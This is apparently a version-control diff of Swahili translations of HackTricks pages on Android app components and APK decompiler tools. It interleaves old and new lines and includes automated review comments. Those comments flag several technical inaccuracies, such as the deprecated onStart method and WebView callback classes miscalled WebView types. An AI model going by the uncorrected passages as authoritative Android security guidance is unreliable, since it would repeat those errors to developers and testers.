Huduma ni za kubadilika; zinaweza kuanzishwa kwa njia mbalimbali, ambapo **Intents** ndiyo njia kuu ya kuzizindua kama kiingilio cha programu. Mara huduma inapozinduliwa kwa kutumia njia ya `startService`, njia yake ya `onStart` inaanza kufanya kazi na inaendelea kukimbia hadi njia ya `stopService` itakapoitwa wazi. Vinginevyo, ikiwa jukumu la huduma linategemea muunganisho wa mteja hai, njia ya `bindService` inatumika kuunganisha mteja na huduma, ikihusisha njia ya `onBind` kwa ajili ya kupitisha data.
Matumizi ya kuvutia ya huduma ni pamoja na kucheza muziki wa nyuma au kupata data ya mtandao bila kuzuia mwingiliano wa mtumiaji na programu. Zaidi ya hayo, huduma zinaweza kuwa kupatikana kwa michakato mingine kwenye kifaa kimoja kupitia **kupeleka**. Hii sio tabia ya msingi na inahitaji usanidi wa wazi kwenye faili ya Android Manifest:
Matumizi ya kuvutia ya huduma ni pamoja na upigaji muziki wa nyuma au upataji wa data ya mtandao bila kuingilia mwingiliano wa mtumiaji na programu. Aidha, huduma zinaweza kufanywa kupatikana kwa michakato mingine kwenye kifaa hicho hicho kupitia **exporting**. Hii si tabia ya kawaida na inahitaji usanidi wazi katika faili ya Android Manifest:
```xml
<service android:name=".ExampleExportedService" android:exported="true"/>
```
### Wapokeaji wa Matangazo
### Broadcast Receivers
**Wapokeaji wa matangazo** wanafanya kazi kama wasikilizaji katika mfumo wa ujumbe, kuruhusu programu nyingi kujibu ujumbe sawa kutoka kwa mfumo. Programu inaweza **kujiandikisha mpokeaji** kwa **njia mbili kuu**: kupitia **Mwongozo** wa programu au **kwa njia ya kudhibiti** ndani ya msimbo wa programu kupitia API ya **`registerReceiver`**. Katika Mwongozo, matangazo hufafanuliwa kwa idhini, wakati wapokeaji waliojiandikisha kwa njia ya kudhibiti wanaweza pia kufafanua idhini wakati wa usajili.
**Broadcast receivers** hufanya kazi kama wasikilizaji katika mfumo wa ujumbe, ikiruhusu programu nyingi kujibu ujumbe sawa kutoka kwa mfumo. Programu inaweza **kujiandikisha mpokeaji** kwa **njia mbili kuu**: kupitia **Manifest** ya programu au **kwa njia ya kidinamik** ndani ya msimbo wa programu kupitia **`registerReceiver`** API. Katika Manifest, matangazo yanachujwa kwa ruhusa, wakati wapokeaji waliojiandikisha kwa njia ya kidinamik wanaweza pia kubainisha ruhusa wakati wa kujiandikisha.
**Vichungi vya nia** ni muhimu katika njia zote za usajili, kufafanua ni matangazo gani yanachochea mpokeaji. Mara tu tangazo linalolingana linapotumwa, njia ya **`onReceive`** ya mpokeaji huitwa, ikiruhusu programu kurekebisha tabia kulingana, kama vile kurekebisha tabia kujibu onyo la betri iliyopungua.
**Intent filters** ni muhimu katika mbinu zote za kujiandikisha, zikiamua ni matangazo gani yanayochochea mpokeaji. Mara matangazo yanayolingana yanapotumwa, njia ya **`onReceive`** ya mpokeaji inaitwa, ikiruhusu programu kujibu ipasavyo, kama kubadilisha tabia kwa kujibu onyo la betri ya chini.
Matangazo yanaweza kuwa **ya kiasinkroni**, yakifikia wapokeaji wote bila mpangilio, au **ya kusinkroni**, ambapo wapokeaji wanapata tangazo kulingana na vipaumbele vilivyowekwa. Walakini, ni muhimu kutambua hatari ya usalama, kwani programu yoyote inaweza kujipa kipaumbele yenyewe ili kuingilia kati tangazo.
Matangazo yanaweza kuwa **asynchronous**, yakifika kwa wapokeaji wote bila mpangilio, au **synchronous**, ambapo wapokeaji wanapata matangazo kulingana na vipaumbele vilivyowekwa. Hata hivyo, ni muhimu kutambua hatari ya usalama, kwani programu yoyote inaweza kujipa kipaumbele ili kukamata tangazo.
Ili kuelewa utendaji wa mpokeaji, tafuta njia ya **`onReceive`** ndani ya darasa lake. Msimbo wa njia hii unaweza kubadilisha Nia iliyopokelewa, ikisisitiza umuhimu wa ukaguzi wa data na wapokeaji, hasa katika **Matangazo Yaliyoagizwa**, ambayo yanaweza kurekebisha au kudondosha Nia.
Ili kuelewa kazi ya mpokeaji, angalia njia ya **`onReceive`** ndani ya darasa lake. Msimbo wa njia hii unaweza kubadilisha Intent iliyopokelewa, ikionyesha umuhimu wa uthibitisho wa data na wapokeaji, hasa katika **Ordered Broadcasts**, ambazo zinaweza kubadilisha au kuacha Intent.
### Mtoaji wa Yaliyomo
### Content Provider
**Watoaji wa Yaliyomo** ni muhimu kwa **kushiriki data iliyopangiliwa** kati ya programu, ikisisitiza umuhimu wa kutekeleza **idhini** ili kuhakikisha usalama wa data. Wao huruhusu programu kupata data kutoka vyanzo mbalimbali, ikiwa ni pamoja na mabadiliko, mfumo wa faili, au wavuti. Idhini maalum, kama **`readPermission`** na **`writePermission`**, ni muhimu kwa kudhibiti upatikanaji. Aidha, upatikanaji wa muda unaweza kutolewa kupitia mipangilio ya **`grantUriPermission`** katika mwongozo wa programu, ikichangamana na sifa kama vile `path`, `pathPrefix`, na `pathPattern` kwa kudhibiti upatikanaji kwa undani.
**Content Providers** ni muhimu kwa **kushiriki data iliyopangwa** kati ya programu, ikisisitiza umuhimu wa kutekeleza **ruhusa** ili kuhakikisha usalama wa data. Wanaruhusu programu kufikia data kutoka vyanzo mbalimbali, ikiwa ni pamoja na hifadhidata, mifumo ya faili, au mtandao. Ruhusa maalum, kama **`readPermission`** na **`writePermission`**, ni muhimu kwa kudhibiti ufikiaji. Zaidi ya hayo, ufikiaji wa muda unaweza kutolewa kupitia mipangilio ya **`grantUriPermission`** katika manifest ya programu, ikitumia sifa kama `path`, `pathPrefix`, na `pathPattern` kwa udhibiti wa ufikiaji wa kina.
Uthibitishaji wa kuingiza ni muhimu kuzuia udhaifu, kama vile kuingizwa kwa SQL. Watoaji wa Yaliyomo hutoa operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, kurahisisha upangilizi wa data na kushiriki kati ya programu.
Uthibitisho wa ingizo ni muhimu ili kuzuia udhaifu, kama vile SQL injection. Content Providers zinasaidia operesheni za msingi: `insert()`, `update()`, `delete()`, na `query()`, zikifanikisha usimamizi wa data na kushiriki kati ya programu.
**FileProvider**, Mtoaji wa Yaliyomo maalum, unazingatia kushiriki faili kwa usalama. Imefafanuliwa katika mwongozo wa programu na sifa maalum za kudhibiti upatikanaji wa folda, zikionyeshwa na `android:exported` na `android:resource` inayoelekeza kwa mipangilio ya folda. Tahadhari inashauriwa wakati wa kushiriki saraka ili kuepuka kufunua data nyeti kwa bahati mbaya.
**FileProvider**, Content Provider maalum, inazingatia kushiriki faili kwa usalama. Inafafanuliwa katika manifest ya programu kwa sifa maalum za kudhibiti ufikiaji wa folda, zinazoonyeshwa na `android:exported` na `android:resource` zikielekeza kwenye mipangilio ya folda. Tahadhari inashauriwa wakati wa kushiriki saraka ili kuepuka kufichua data nyeti bila kukusudia.
Mfano wa tangazo la mwongozo kwa FileProvider:
Mfano wa tangazo la manifest kwa FileProvider:
```xml
<provider android:name="androidx.core.content.FileProvider"
android:authorities="com.example.myapp.fileprovider"
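Review bot: both versions of the Services paragraph say that `startService` drives the service's `onStart` method; `Service.onStart` has been deprecated since API level 5 and the callback a reviewer should look for is `onStartCommand(Intent, int, int)`, which is also where attacker-controlled intent data enters an exported service, so the text should name it. In the Content Provider paragraph, `grantUriPermission` is described as a manifest setting; in the manifest the relevant items are the `android:grantUriPermissions` attribute and the `<grant-uri-permission>` child element (with `path`, `pathPrefix`, `pathPattern`), while `Context.grantUriPermission()` is the runtime call, and the sentence conflates the two.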
@ -330,49 +332,49 @@ android:exported="false">
android:resource="@xml/filepaths" />
</provider>
```
Na mfano wa kueleza folda zilizoshirikiwa katika `filepaths.xml`:
Na mfano wa kufafanua folda zinazoshirikiwa katika `filepaths.xml`:
```xml
<paths>
<files-path path="images/" name="myimages" />
</paths>
```
Kwa maelezo zaidi angalia:
- [Waundaji wa Android: Watoa Huduma wa Yaliyomo](https://developer.android.com/guide/topics/providers/content-providers)
- [Waundaji wa Android: FileProvider](https://developer.android.com/training/secure-file-sharing/setup-sharing)
For further information check:
- [Android Developers: Content Providers](https://developer.android.com/guide/topics/providers/content-providers)
- [Android Developers: FileProvider](https://developer.android.com/training/secure-file-sharing/setup-sharing)
## WebViews
WebViews ni kama **vivinjari vidogo vya wavuti** ndani ya programu za Android, vikitoa yaliyomo kutoka kwenye wavuti au kutoka kwenye faili za ndani. Wanakabili hatari sawa na vivinjari vya kawaida, lakini kuna njia za **kupunguza hatari hizi** kupitia **vipimo maalum**.
WebViews ni kama **vivinjari vidogo vya wavuti** ndani ya programu za Android, vinavyovuta maudhui kutoka kwenye wavuti au kutoka kwenye faili za ndani. Vinakabiliwa na hatari sawa na vivinjari vya kawaida, lakini kuna njia za **kupunguza hatari hizi** kupitia **mipangilio** maalum.
Android inatoa aina mbili kuu za WebView:
- **WebViewClient** ni nzuri kwa HTML ya msingi lakini haisaidii kazi ya onyo ya JavaScript, ikibadilisha jinsi mashambulizi ya XSS yanavyoweza jaribiwa.
- **WebViewClient** ni nzuri kwa HTML ya msingi lakini haisaidii kazi ya arifa ya JavaScript, ikihusisha jinsi mashambulizi ya XSS yanavyoweza kupimwa.
- **WebChromeClient** inafanya kazi zaidi kama uzoefu kamili wa kivinjari cha Chrome.
Jambo muhimu ni kwamba vivinjari vya WebView **havishiriki vidakuzi** na kivinjari kikuu cha kifaa.
Kwa kupakia yaliyomo, njia kama ````loadUrl````, ````loadData````, na ````loadDataWithBaseURL```` zinapatikana. Ni muhimu kuhakikisha kuwa URL au faili hizi ni **salama kutumia**. Vipimo vya usalama vinaweza kusimamiwa kupitia darasa la ````WebSettings````. Kwa mfano, kulemaza JavaScript na ````setJavaScriptEnabled(false)```` kunaweza kuzuia mashambulizi ya XSS.
Kwa ajili ya kupakia maudhui, mbinu kama ````loadUrl````, ````loadData````, na ````loadDataWithBaseURL```` zinapatikana. Ni muhimu kuhakikisha URLs hizi au faili ni **salama kutumia**. Mipangilio ya usalama inaweza kudhibitiwa kupitia darasa la ````WebSettings````. Kwa mfano, kuzima JavaScript kwa ````setJavaScriptEnabled(false)```` kunaweza kuzuia mashambulizi ya XSS.
"Bridge" ya JavaScript inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji njia zitambuliwe na ````@JavascriptInterface```` kwa usalama kutoka Android 4.2 kuendelea.
JavaScript "Bridge" inaruhusu vitu vya Java kuingiliana na JavaScript, ikihitaji mbinu kuwekewa alama na ````@JavascriptInterface```` kwa usalama kuanzia Android 4.2.
Kuruhusu ufikiaji wa yaliyomo (````setAllowContentAccess(true)````) inaruhusu WebViews kufikia Watoa Huduma wa Yaliyomo, ambayo inaweza kuwa hatari isipokuwa URL za yaliyomo zimehakikiwa kuwa salama.
Kuruhusu ufikiaji wa maudhui (````setAllowContentAccess(true)````) kunaruhusu WebViews kufikia Watoa Maudhui, ambayo inaweza kuwa hatari isipokuwa URLs za maudhui zihakikishwe kuwa salama.
Kudhibiti ufikiaji wa faili:
- Kulemaza ufikiaji wa faili (````setAllowFileAccess(false)````) kunapunguza ufikiaji wa mfumo wa faili, na ubaguzi kwa mali fulani, kuhakikisha zinatumika tu kwa yaliyomo isiyo nyeti.
Ili kudhibiti ufikiaji wa faili:
- Kuzima ufikiaji wa faili (````setAllowFileAccess(false)````) kunapunguza ufikiaji wa mfumo wa faili, huku kukiwa na visamaha kwa mali fulani, kuhakikisha zinatumika tu kwa maudhui yasiyo nyeti.
## Vipengele vingine vya Programu na Usimamizi wa Kifaa cha Mkononi
## Other App Components and Mobile Device Management
### **Kusainiwa Kidijitali kwa Programu**
### **Digital Signing of Applications**
- **Kusainiwa kidijitali** ni lazima kwa programu za Android, ikihakikisha zimeandikwa **kwa uhalisia** kabla ya usakinishaji. Mchakato huu hutumia cheti kwa utambulisho wa programu na lazima ithibitishwe na msimamizi wa pakiti ya kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zilizojisaini au kuthibitishwa na CA ya nje**, zikilinda dhidi ya ufikiaji usioruhusiwa na kuhakikisha programu inabaki bila kuguswa wakati wa kufikishwa kwenye kifaa.
- **Sahihi ya kidijitali** ni lazima kwa programu za Android, kuhakikisha zimeandikwa **kwa njia halisi** kabla ya usakinishaji. Mchakato huu unatumia cheti kwa ajili ya utambulisho wa programu na lazima uhakikishwe na meneja wa pakiti wa kifaa wakati wa usakinishaji. Programu zinaweza kuwa **zimejitia saini au kuthibitishwa na CA ya nje**, kulinda dhidi ya ufikiaji usioidhinishwa na kuhakikisha programu inabaki bila kubadilishwa wakati wa usafirishaji wake kwa kifaa.
### **Uhakiki wa Programu kwa Usalama Ulioboreshwa**
### **App Verification for Enhanced Security**
- Kuanzia **Android 4.2**, kipengele kinachoitwa **Thibitisha Programu** kuruhusu watumiaji kupata programu zilizochunguzwa kwa usalama kabla ya usakinishaji. Mchakato huu wa **uhakiki** unaweza kuonya watumiaji dhidi ya programu zenye hatari, au hata kuzuia usakinishaji wa zile zenye nia hasidi, kuboresha usalama wa mtumiaji.
- Kuanzia **Android 4.2**, kipengele kinachoitwa **Verify Apps** kinawaruhusu watumiaji kuangalia programu kwa usalama kabla ya usakinishaji. Mchakato huu wa **uthibitishaji** unaweza kuwatahadharisha watumiaji dhidi ya programu zinazoweza kuwa hatari, au hata kuzuia usakinishaji wa zile zenye uharibifu mkubwa, kuimarisha usalama wa mtumiaji.
### **Usimamizi wa Kifaa cha Mkononi (MDM)**
### **Mobile Device Management (MDM)**
- **Suluhisho za MDM** hutoa **usimamizi na usalama** kwa vifaa vya mkononi kupitia **API ya Usimamizi wa Kifaa**. Wanahitaji usakinishaji wa programu ya Android kusimamia na kuhakikisha usalama wa vifaa vya mkononi kwa ufanisi. Majukumu muhimu ni pamoja na **kuweka sera za nywila**, **kuamuru kifaa cha kifaa**, na **kuruhusu kufuta data kwa mbali**, kuhakikisha udhibiti na usalama kamili juu ya vifaa vya mkononi.
- **MDM solutions** zinatoa **uangalizi na usalama** kwa vifaa vya simu kupitia **Device Administration API**. Zinahitaji usakinishaji wa programu ya Android ili kudhibiti na kulinda vifaa vya simu kwa ufanisi. Kazi kuu ni pamoja na **kulazimisha sera za nywila**, **kulazimisha usimbaji wa hifadhi**, na **kuruhusu kufuta data kwa mbali**, kuhakikisha udhibiti na usalama wa kina juu ya vifaa vya simu.
```java
// Example of enforcing a password policy with MDM
DevicePolicyManager dpm = (DevicePolicyManager) getSystemService(Context.DEVICE_POLICY_SERVICE);
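Review bot: the WebViews section says Android offers "two main types of WebView", `WebViewClient` and `WebChromeClient`; these are not WebView types but callback classes installed on the same `WebView` via `setWebViewClient`/`setWebChromeClient`, and the point about `alert()` is really that JavaScript dialogs are only shown when a `WebChromeClient` handling `onJsAlert` is installed, which is why an XSS probe in a WebView can appear to do nothing. Suggest rewording both versions of that list accordingly. The `@JavascriptInterface` requirement is stated correctly (it applies when targeting API 17 / Android 4.2 and above).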
@ -383,22 +385,23 @@ if (dpm.isAdminActive(adminComponent)) {
dpm.setPasswordMinimumLength(adminComponent, 8);
}
```
**Kikundi cha Usalama cha Try Hard**
**Try Hard Security Group**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
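Review bot: in the MDM snippet, `dpm.setPasswordMinimumLength(adminComponent, 8);` is deprecated as of API level 31 (Android 12) in favour of `setRequiredPasswordComplexity`, and the guard `dpm.isAdminActive(adminComponent)` only confirms the admin receiver is enabled; the call still throws `SecurityException` unless the admin declares `limit-password` in its `<uses-policies>`, so a comment on both points would help readers assessing a device-admin app. The banner change is fine: the old line linked `@carlospolopm` to `https://twitter.com/hacktricks_live`, and the new `@hacktricks\_live` fixes the mismatch.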

View file

@ -1,85 +1,73 @@
# Wadecompilers wa APK
# APK decompilers
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
{% endhint %}
**Kwa maelezo zaidi kuhusu kila chombo angalia chapisho halisi kutoka [https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr](https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr)**
**Kwa maelezo zaidi kuhusu kila chombo angalia chapisho la asili kutoka [https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr](https://eiken.dev/blog/2021/02/how-to-break-your-jar-in-2021-decompilation-guide-for-jars-and-apks/#cfr)**
### [JD-Gui](https://github.com/java-decompiler/jd-gui)
Kama decompiler ya kwanza ya GUI ya Java, **JD-Gui** inakuwezesha kuchunguza nambari ya Java ndani ya faili za APK. Ni rahisi kutumia; baada ya kupata APK, tuifungue na JD-Gui ili tuchunguze nambari.
Kama decompiler ya GUI ya kwanza ya Java, **JD-Gui** inakuwezesha kuchunguza msimbo wa Java ndani ya faili za APK. Ni rahisi kutumia; baada ya kupata APK, fungua tu na JD-Gui ili kukagua msimbo.
### [Jadx](https://github.com/skylot/jadx)
**Jadx** inatoa kiolesura rahisi cha mtumiaji kwa kudecompile nambari ya Java kutoka kwenye programu za Android. Inapendekezwa kwa urahisi wake wa matumizi kwenye majukwaa tofauti.
**Jadx** inatoa kiolesura rafiki kwa mtumiaji kwa ajili ya decompiling msimbo wa Java kutoka kwa programu za Android. Inapendekezwa kwa urahisi wake wa matumizi kwenye majukwaa tofauti.
- Ili kuzindua GUI, nenda kwenye saraka ya bin na tekeleza: `jadx-gui`
- Kwa matumizi ya mstari wa amri, kudecompile APK na: `jadx app.apk`
- Ili kubainisha saraka ya pato au kurekebisha chaguo za kudecompile: `jadx app.apk -d <njia ya saraka ya pato> --no-res --no-src --no-imports`
- Kwa matumizi ya mstari wa amri, decompile APK kwa: `jadx app.apk`
- Ili kubainisha saraka ya matokeo au kurekebisha chaguzi za decompilation: `jadx app.apk -d <path to output dir> --no-res --no-src --no-imports`
### [GDA-android-reversing-Tool](https://github.com/charles2gan/GDA-android-reversing-Tool)
**GDA**, chombo kinachofanya kazi tu kwenye Windows, kinatoa huduma nyingi za kurekebisha programu za Android. Sakinisha na endesha GDA kwenye mfumo wako wa Windows, kisha pakia faili ya APK kwa uchambuzi.
**GDA**, chombo cha Windows pekee, kinatoa vipengele vingi kwa ajili ya uhandisi wa nyuma wa programu za Android. Sakinisha na endesha GDA kwenye mfumo wako wa Windows, kisha pakua faili ya APK kwa uchambuzi.
### [Bytecode-Viewer](https://github.com/Konloch/bytecode-viewer/releases)
Kwa kutumia **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers kadhaa. Baada ya kupakua, endesha Bytecode-Viewer, pakia APK yako, na chagua decompilers unayotaka kutumia kwa uchambuzi wa wakati mmoja.
Pamoja na **Bytecode-Viewer**, unaweza kuchambua faili za APK kwa kutumia decompilers kadhaa. Baada ya kupakua, endesha Bytecode-Viewer, pakua APK yako, na chagua decompilers unazotaka kutumia kwa uchambuzi wa pamoja.
### [Enjarify](https://github.com/Storyyeller/enjarify)
**Enjarify** inabadilisha bytecode ya Dalvik kuwa bytecode ya Java, kuruhusu zana za uchambuzi wa Java kuchambua programu za Android kwa ufanisi zaidi.
**Enjarify** inatafsiri Dalvik bytecode kuwa Java bytecode, ikiruhusu zana za uchambuzi wa Java kuchambua programu za Android kwa ufanisi zaidi.
- Ili kutumia Enjarify, tekeleza: `enjarify app.apk`
Hii inazalisha bytecode ya Java inayolingana na APK iliyotolewa.
- Ili kutumia Enjarify, endesha: `enjarify app.apk`
Hii inazalisha Java bytecode sawa na APK iliyotolewa.
### [CFR](https://github.com/leibnitz27/cfr)
**CFR** inaweza kudecompile vipengele vya kisasa vya Java. Tumia kama ifuatavyo:
**CFR** ina uwezo wa decompiling vipengele vya kisasa vya Java. Tumia kama ifuatavyo:
- Kwa kudecompile kawaida: `java -jar ./cfr.jar "app.jar" --outputdir "saraka_ya_pato"`
- Kwa faili kubwa za JAR, rekebisha ugawaji wa kumbukumbu ya JVM: `java -Xmx4G -jar ./cfr.jar "app.jar" --outputdir "saraka_ya_pato"`
- Kwa decompilation ya kawaida: `java -jar ./cfr.jar "app.jar" --outputdir "output_directory"`
- Kwa faili kubwa za JAR, rekebisha ugawaji wa kumbukumbu ya JVM: `java -Xmx4G -jar ./cfr.jar "app.jar" --outputdir "output_directory"`
### [Fernflower](https://github.com/JetBrains/intellij-community/tree/master/plugins/java-decompiler/engine)
**Fernflower**, decompiler ya uchambuzi, inahitaji kujengwa kutoka chanzo. Baada ya kujenga:
**Fernflower**, decompiler wa uchambuzi, inahitaji kujengwa kutoka chanzo. Baada ya kujenga:
- Kudecompile faili ya JAR: `java -jar ./fernflower.jar "app.jar" "saraka_ya_pato"`
Kisha, chukua faili za `.java` kutoka kwenye JAR iliyozalishwa kwa kutumia `unzip`.
- Decompile faili ya JAR: `java -jar ./fernflower.jar "app.jar" "output_directory"`
Kisha, toa faili za `.java` kutoka kwa JAR iliyozalishwa kwa kutumia `unzip`.
### [Krakatau](https://github.com/Storyyeller/Krakatau)
**Krakatau** inatoa udhibiti wa kina juu ya kudecompile, haswa kwa kushughulikia maktaba za nje.
**Krakatau** inatoa udhibiti wa kina juu ya decompilation, hasa kwa kushughulikia maktaba za nje.
- Tumia Krakatau kwa kubainisha njia ya maktaba ya kawaida na faili ya JAR ya kudecompile: `./Krakatau/decompile.py -out "saraka_ya_pato" -skip -nauto -path "./jrt-extractor/rt.jar" "app.jar"`
- Tumia Krakatau kwa kubainisha njia ya maktaba ya kawaida na faili ya JAR ya decompile: `./Krakatau/decompile.py -out "output_directory" -skip -nauto -path "./jrt-extractor/rt.jar" "app.jar"`
### [procyon](https://github.com/mstrobel/procyon)
Kwa kudecompile rahisi na **procyon**:
Kwa decompilation rahisi na **procyon**:
- Kudecompile faili ya JAR kwenye saraka iliyoainishwa: `procyon -jar "app.jar" -o "saraka_ya_pato"`
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
- Decompile faili ya JAR kwenye saraka iliyobainishwa: `procyon -jar "app.jar" -o "output_directory"`
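Review bot: the new header block of this file closes a single `{% hint style="success" %}` opener with two consecutive `{% endhint %}` lines (`{% endhint %}` / `{% endhint %}` right before the "Kwa maelezo zaidi" paragraph); the second closer has no matching opener and will break the GitBook hint rendering, so drop one of them. The new command lines correctly keep the upstream placeholders (`<path to output dir>`, `output_directory`) untranslated where the old lines had localized them to `saraka_ya_pato`, which is the right call since those are literal command arguments.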

@ -1,16 +1,17 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
